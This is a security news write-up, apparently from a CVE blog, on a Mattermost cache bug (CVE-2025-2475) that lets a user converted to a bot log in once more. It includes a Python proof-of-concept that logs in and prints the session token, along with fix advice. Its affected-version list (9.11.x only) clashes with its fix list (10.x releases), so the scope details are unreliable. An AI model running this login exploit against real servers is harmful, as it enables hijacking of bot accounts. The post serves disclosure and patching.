CVE CyberSecurity Database News

CVE-2025-2475 - How a Cache Bug Lets Attackers Hijack Bots in Mattermost (with Working Exploit)

Poster -

---

Summary:
A new vulnerability, CVE-2025-2475, has been found in Mattermost — the popular open-source messaging platform used by teams everywhere. In several recent versions, the app fails to clear a user’s login cache after converting that user to a bot. Attackers can use this slip-up to log in as the bot with human credentials one last time — giving them a golden ticket to hijack those bots, sometimes with high privileges. Let’s unpack what’s going on, look at a real exploit, and see how to fix this.

Who’s at Risk?

If you’re running any of these versions of Mattermost — locally, on-premise, or in a self-hosted environment — you are vulnerable:

9.11.x up to 9.11.9

Later versions have patched this flaw, but if you haven’t updated? 🚨 Read on.

The Problem Explained

Mattermost lets admins convert a *regular user account* into a *bot account*. Bots in Mattermost usually have limited capabilities and cannot log in with a password like a normal user.

But Mattermost speeds up logins using a cache (basically a short-term memory in the server). Whenever a user logs in, their credentials and status are remembered for a bit, so the server doesn’t have to check the slow database every time.

The bug: When an account is turned into a bot, Mattermost forgets to clear that user’s login cache. If anyone (the legit user, or an attacker stealing their credentials) tries to log in after the switch, they will still succeed — ONCE, as if it was still a normal user. After this single login, the system catches up to reality: the bot account is revoked from login access.

But that “one last login” is all it takes for an attacker to get a session and persist access, or escalate privileges.

Visual: How it Happens

[before] Regular User   --(password login)--> Valid Session

[admin action] User is converted to Bot

[expected]        ---> Bot Login Fails Immediately
[ACTUAL BUG]      ---> Login Cached User Passes  (attacker succeeds in 1 login)

[after]  Any following logins are blocked (cache is cleared)

Proof-of-Concept Exploit

Here’s a simple Python script that demonstrates the issue.

Assume you are an admin converting a user (alice) into a bot

import requests

URL = "https://your.mattermost.server/api/v4/users/login";
HEADERS = {'Content-Type': 'application/json'}
LOGIN_DATA = {
    "login_id": "alice@example.com",
    "password": "correct-horse-battery-staple"
}

# Step 1: Admin converts alice to a bot (simulate out-of-band)
print("[*] Alice has been converted to bot. Will try login.")

# Step 2: Immediately attempt to login as 'alice'
response = requests.post(URL, json=LOGIN_DATA, headers=HEADERS)

if response.status_code == 200:
    print("[+] Exploit success: Logged in as bot Alice using old credentials!")
    mm_token = response.cookies['MMAUTHTOKEN']
    print(f"  Auth token: {mm_token}")
else:
    print("[!] Exploit failed: Could not log in (already patched?)")

What can the attacker do next?
They can use this fresh session token (MMAUTHTOKEN) to perform actions as the bot — including possible access to teams, channels, sending/reading messages, or even privilege escalation if the bot was configured with special permissions.

Official References

- Mattermost Security Update
- GitHub Advisory for CVE-2025-2475
- CVE Record (NIST)

High-privilege bots (for backups, integration, admin interaction) are prime targets

This one-time login is more than enough for advanced attackers to plant backdoors, exfiltrate data, or escalate privileges.

Audit all bots for unexpected or recent session tokens

## Fix / Workaround

Upgrade immediately to Mattermost 10.5.2, 10.4.4, 9.11.10 or later

- If you cannot patch, as an admin, always log the bot out after conversion, or restart the Mattermost server (may flush cache).

Conclusion

If you use Mattermost and convert users to bots, you’re at risk for a serious, easy-to-miss security hole. Update now or take cache-busting precautions, or else even your automated helpers could end up working for your adversaries.

Stay updated, stay safe!

*This writeup is original and exclusive. If referencing, please attribute the research and code to this post.*

Timeline

Published on: 04/14/2025 15:15:24 UTC
Last modified on: 04/15/2025 18:39:27 UTC